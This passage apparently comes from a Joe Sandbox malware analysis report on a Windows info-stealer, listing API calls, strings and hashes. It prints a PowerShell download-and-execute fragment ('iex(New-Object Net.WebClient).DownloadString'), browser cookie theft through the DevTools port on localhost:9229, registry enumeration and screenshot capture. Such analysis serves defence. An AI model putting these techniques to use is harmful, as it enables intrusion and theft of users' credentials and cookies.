                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CBFBA
                                  • ShellExecuteEx.SHELL32(?), ref: 002CC00C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 4016326548-898575020
                                  • Opcode ID: 3d8295f7b53ef03da48681428fd221d19105c5bb0c582282d48719c4178bb1b3
                                  • Instruction ID: db3a15cff0692b049176f4473b9d57df879f7320088d9d99614cd0af32dfa0fd
                                  • Opcode Fuzzy Hash: 3d8295f7b53ef03da48681428fd221d19105c5bb0c582282d48719c4178bb1b3
                                  • Instruction Fuzzy Hash: EE61B631A303469BDB12AFB58C8AAEE7BA9AF04740F54452DF549E7242DB34CD258F90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D184F
                                  • lstrlen.KERNEL32(011B7308), ref: 002D1860
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1887
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002D1892
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D18C1
                                  • lstrlen.KERNEL32(002E4FA0), ref: 002D18D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D18F4
                                  • lstrcat.KERNEL32(00000000,002E4FA0), ref: 002D1900
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D192F
                                  • lstrlen.KERNEL32(011B7328), ref: 002D1945
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D196C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002D1977
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D19A6
                                  • lstrlen.KERNEL32(002E4FA0), ref: 002D19B8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D19D9
                                  • lstrcat.KERNEL32(00000000,002E4FA0), ref: 002D19E5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1A14
                                  • lstrlen.KERNEL32(011B72C8), ref: 002D1A2A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1A51
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002D1A5C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1A8B
                                  • lstrlen.KERNEL32(011B7218), ref: 002D1AA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1AC8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002D1AD3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1B02
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1049500425-0
                                  • Opcode ID: f258521c5b132c3028fc06b96ce09a01c34fcdb4bebab326e22c6fea174f1187
                                  • Instruction ID: 812cf0b43322476a7d0f64d0c08a71155cdb9e675ff04164f020dc6dc5504d33
                                  • Opcode Fuzzy Hash: f258521c5b132c3028fc06b96ce09a01c34fcdb4bebab326e22c6fea174f1187
                                  • Instruction Fuzzy Hash: D6912070621743EBEB20DFB5DD98A66B7E8AF04340B24483AA8C6D7751DB34EC65CB50
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C4793
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 002C47C5
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C4812
                                  • lstrlen.KERNEL32(002E4B60), ref: 002C481D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C483A
                                  • lstrcat.KERNEL32(00000000,002E4B60), ref: 002C4846
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C486B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4898
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C48A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C48CA
                                  • StrStrA.SHLWAPI(?,00000000), ref: 002C48DC
                                  • lstrlen.KERNEL32(?), ref: 002C48F0
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C4931
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C49B8
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C49E1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C4A0A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C4A30
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C4A5D
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 4107348322-3310892237
                                  • Opcode ID: 28e24491fb09b49b20d7f29f85f46c41191601f19b159fc70f396057db7c0388
                                  • Instruction ID: a59e4b3c7deaf6f316436722b4b23badc49d4a0a626aa680d2f61eda1ec87176
                                  • Opcode Fuzzy Hash: 28e24491fb09b49b20d7f29f85f46c41191601f19b159fc70f396057db7c0388
                                  • Instruction Fuzzy Hash: 6BB19071A203469BDB21FF64D895EAF77B5AF44340F144228F885AB351DB30EC258B90
                                  APIs
                                    • Part of subcall function 002B90C0: InternetOpenA.WININET(002DCFEC,00000001,00000000,00000000,00000000), ref: 002B90DF
                                    • Part of subcall function 002B90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 002B90FC
                                    • Part of subcall function 002B90C0: InternetCloseHandle.WININET(00000000), ref: 002B9109
                                  • strlen.MSVCRT ref: 002B92E1
                                  • strlen.MSVCRT ref: 002B92FA
                                    • Part of subcall function 002B8980: std::_Xinvalid_argument.LIBCPMT ref: 002B8996
                                  • strlen.MSVCRT ref: 002B9399
                                  • strlen.MSVCRT ref: 002B93E6
                                  • lstrcat.KERNEL32(?,cookies), ref: 002B9547
                                  • lstrcat.KERNEL32(?,002E1794), ref: 002B9559
                                  • lstrcat.KERNEL32(?,?), ref: 002B956A
                                  • lstrcat.KERNEL32(?,002E4B98), ref: 002B957C
                                  • lstrcat.KERNEL32(?,?), ref: 002B958D
                                  • lstrcat.KERNEL32(?,.txt), ref: 002B959F
                                  • lstrlen.KERNEL32(?), ref: 002B95B6
                                  • lstrlen.KERNEL32(?), ref: 002B95DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B9614
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 1201316467-3542011879
                                  • Opcode ID: 73939af79f24fd699a3d6108c6e8019c4305f5a6223e0142304c98dd646d3e6f
                                  • Instruction ID: 4d968477973c859e3580cd9de21bbefc1f6cb72d4efcd64e02ff703a328a366e
                                  • Opcode Fuzzy Hash: 73939af79f24fd699a3d6108c6e8019c4305f5a6223e0142304c98dd646d3e6f
                                  • Instruction Fuzzy Hash: E7E13A71E20258DFDF10DFA8D880ADDBBB5BF48340F6044A9E649A7241DB309E95CF91
                                  APIs
                                  • memset.MSVCRT ref: 002CD9A1
                                  • memset.MSVCRT ref: 002CD9B3
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 002CD9DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CDA0E
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CDA1C
                                  • lstrcat.KERNEL32(?,011CE2B0), ref: 002CDA36
                                  • lstrcat.KERNEL32(?,?), ref: 002CDA4A
                                  • lstrcat.KERNEL32(?,011CD580), ref: 002CDA5E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CDA8E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 002CDA95
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CDAFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2367105040-0
                                  • Opcode ID: d3c3a4c97b3ef0bed005e2b188239ee821445be194e798a4966d64237d85f31b
                                  • Instruction ID: ee4dae3eb595c98bdf7852d9a2202459af6408e50ffbbb46b01e6dd810f59aa4
                                  • Opcode Fuzzy Hash: d3c3a4c97b3ef0bed005e2b188239ee821445be194e798a4966d64237d85f31b
                                  • Instruction Fuzzy Hash: B6B1907192025A9FDB10EF64DC84EEEB7B9AF88300F544579E94AE7241DA309E64CF90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BB330
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB37E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB3A9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BB3B1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB3D9
                                  • lstrlen.KERNEL32(002E4C50), ref: 002BB450
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB474
                                  • lstrcat.KERNEL32(00000000,002E4C50), ref: 002BB480
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB4A9
                                  • lstrlen.KERNEL32(00000000), ref: 002BB52D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB557
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BB55F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB587
                                  • lstrlen.KERNEL32(002E4AD4), ref: 002BB5FE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB622
                                  • lstrcat.KERNEL32(00000000,002E4AD4), ref: 002BB62E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB65E
                                  • lstrlen.KERNEL32(?), ref: 002BB767
                                  • lstrlen.KERNEL32(?), ref: 002BB776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB79E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 4a1a51320a58a400e565561013e415e512eb98fdc14af132c2ff1f177e43c1c7
                                  • Instruction ID: 30c975fdbe35ff505528aac6cdb618aacd1496f45872244ad3dbf9eac8764afa
                                  • Opcode Fuzzy Hash: 4a1a51320a58a400e565561013e415e512eb98fdc14af132c2ff1f177e43c1c7
                                  • Instruction Fuzzy Hash: 1B026330A21206CFDB26DF65D988AAAB7F5BF40344F19806DE4499B3A2D771DC52CF80
                                  APIs
                                    • Part of subcall function 002D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 002D71FE
                                  • RegOpenKeyExA.ADVAPI32(?,011CB0D8,00000000,00020019,?), ref: 002D37BD
                                  • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 002D37F7
                                  • wsprintfA.USER32 ref: 002D3822
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 002D3840
                                  • RegCloseKey.ADVAPI32(?), ref: 002D384E
                                  • RegCloseKey.ADVAPI32(?), ref: 002D3858
                                  • RegQueryValueExA.ADVAPI32(?,011CE0E8,00000000,000F003F,?,?), ref: 002D38A1
                                  • lstrlen.KERNEL32(?), ref: 002D38B6
                                  • RegQueryValueExA.ADVAPI32(?,011CE1D8,00000000,000F003F,?,00000400), ref: 002D3927
                                  • RegCloseKey.ADVAPI32(?), ref: 002D3972
                                  • RegCloseKey.ADVAPI32(?), ref: 002D3989
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 13140697-3278919252
                                  • Opcode ID: 204eb633b1d6bbd91b71ee61aa34dbcf82e72c9ac129f37ee8d0615a4f0dd493
                                  • Instruction ID: 39b74b5417003e8d6d945cd7be803073ef42de41dd96b855bd58efb4ee08b422
                                  • Opcode Fuzzy Hash: 204eb633b1d6bbd91b71ee61aa34dbcf82e72c9ac129f37ee8d0615a4f0dd493
                                  • Instruction Fuzzy Hash: 97918CB2D102499FCB10DFA4DD849EEB7B9FB48310F1485AAE909AB351D731AE45CF90
                                  APIs
                                  • InternetOpenA.WININET(002DCFEC,00000001,00000000,00000000,00000000), ref: 002B90DF
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 002B90FC
                                  • InternetCloseHandle.WININET(00000000), ref: 002B9109
                                  • InternetReadFile.WININET(?,?,?,00000000), ref: 002B9166
                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 002B9197
                                  • InternetCloseHandle.WININET(00000000), ref: 002B91A2
                                  • InternetCloseHandle.WININET(00000000), ref: 002B91A9
                                  • strlen.MSVCRT ref: 002B91BA
                                  • strlen.MSVCRT ref: 002B91ED
                                  • strlen.MSVCRT ref: 002B922E
                                  • strlen.MSVCRT ref: 002B924C
                                    • Part of subcall function 002B8980: std::_Xinvalid_argument.LIBCPMT ref: 002B8996
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 1530259920-2144369209
                                  • Opcode ID: 135f0a677fc9973d20038c769b77b3dc27f8ad60be1c3824affd482214d9e86d
                                  • Instruction ID: 2a90a81e8d0f1a7c810d3bd06c5047c9f38d148e5a62a608912d5986e368ca9a
                                  • Opcode Fuzzy Hash: 135f0a677fc9973d20038c769b77b3dc27f8ad60be1c3824affd482214d9e86d
                                  • Instruction Fuzzy Hash: 67512371A20245ABDB10DFA8DC85FDEF7BEDB44310F14016AF908E3280DBB4AA548B65
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 002D16A1
                                  • lstrcpy.KERNEL32(00000000,011BB608), ref: 002D16CC
                                  • lstrlen.KERNEL32(?), ref: 002D16D9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D16F6
                                  • lstrcat.KERNEL32(00000000,?), ref: 002D1704
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D172A
                                  • lstrlen.KERNEL32(011CA560), ref: 002D173F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D1762
                                  • lstrcat.KERNEL32(00000000,011CA560), ref: 002D176A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1792
                                  • ShellExecuteEx.SHELL32(?), ref: 002D17CD
                                  • ExitProcess.KERNEL32 ref: 002D1803
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                  • String ID: <
                                  • API String ID: 3579039295-4251816714
                                  • Opcode ID: 8ed84cfaea272ac31d4364978c8d146c8c34b115098fd45c927072d5e9d15736
                                  • Instruction ID: 659a3179c4115c6161752966db044e06022a94c6603c5577ca5a64711c01d443
                                  • Opcode Fuzzy Hash: 8ed84cfaea272ac31d4364978c8d146c8c34b115098fd45c927072d5e9d15736
                                  • Instruction Fuzzy Hash: 90518F7092165AABEB11DFA4DD84A9EF7F9AF48300F10413AE509E7351DB30AE25CB94
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CEFE4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CF012
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002CF026
                                  • lstrlen.KERNEL32(00000000), ref: 002CF035
                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 002CF053
                                  • StrStrA.SHLWAPI(00000000,?), ref: 002CF081
                                  • lstrlen.KERNEL32(?), ref: 002CF094
                                  • lstrlen.KERNEL32(00000000), ref: 002CF0B2
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 002CF0FF
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 002CF13F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$AllocLocal
                                  • String ID: ERROR
                                  • API String ID: 1803462166-2861137601
                                  • Opcode ID: fd6e8bdc1d947116d7430b165648f663404e898213376cb14b9ae22794130410
                                  • Instruction ID: 42357b0735d3ada3f582a9407f6cbe237d0cfc83dea79e4e84e404d3f151648c
                                  • Opcode Fuzzy Hash: fd6e8bdc1d947116d7430b165648f663404e898213376cb14b9ae22794130410
                                  • Instruction Fuzzy Hash: D151B1319302429FCB21EF34DD49FAE77A5AF41740F19427CF889AB212DA70DC258B90
                                  APIs
                                  • GetEnvironmentVariableA.KERNEL32(011C9068,004E9BD8,0000FFFF), ref: 002BA026
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BA053
                                  • lstrlen.KERNEL32(004E9BD8), ref: 002BA060
                                  • lstrcpy.KERNEL32(00000000,004E9BD8), ref: 002BA08A
                                  • lstrlen.KERNEL32(002E4C4C), ref: 002BA095
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BA0B2
                                  • lstrcat.KERNEL32(00000000,002E4C4C), ref: 002BA0BE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BA0E4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BA0EF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BA114
                                  • SetEnvironmentVariableA.KERNEL32(011C9068,00000000), ref: 002BA12F
                                  • LoadLibraryA.KERNEL32(011CDA90), ref: 002BA143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                  • String ID:
                                  • API String ID: 2929475105-0
                                  • Opcode ID: cdc165f8524af6b49efb66c5bab2dc904ffea5ee76c9505401261de168b3a28a
                                  • Instruction ID: d4a7de7938e675d8ee1a124c7fab9f6c5a1b369fe29750a47a4513496d4a2e86
                                  • Opcode Fuzzy Hash: cdc165f8524af6b49efb66c5bab2dc904ffea5ee76c9505401261de168b3a28a
                                  • Instruction Fuzzy Hash: 8191E8306207428FDB30AFA8DC84AE637B5FB94784F504469E9498B293EF75DC50CB92
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CC8A2
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CC8D1
                                  • lstrlen.KERNEL32(00000000), ref: 002CC8FC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CC932
                                  • StrCmpCA.SHLWAPI(00000000,002E4C3C), ref: 002CC943
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 42e09e79513f5ca8c43751af03c39664cc73b893bb325c3a9593038c5b51a05d
                                  • Instruction ID: 884fc88fe983fe60d43c841b71cc75cd4449342d9a8345eb186fd8d141fd832e
                                  • Opcode Fuzzy Hash: 42e09e79513f5ca8c43751af03c39664cc73b893bb325c3a9593038c5b51a05d
                                  • Instruction Fuzzy Hash: D9619171D2125A9BDB11EFB5C888FEEBBF8AF05340F244279E849E7241D7748D158B90
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,002D0CF0), ref: 002D4276
                                  • GetDesktopWindow.USER32 ref: 002D4280
                                  • GetWindowRect.USER32(00000000,?), ref: 002D428D
                                  • SelectObject.GDI32(00000000,00000000), ref: 002D42BF
                                  • GetHGlobalFromStream.COMBASE(002D0CF0,?), ref: 002D4336
                                  • GlobalLock.KERNEL32(?), ref: 002D4340
                                  • GlobalSize.KERNEL32(?), ref: 002D434D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
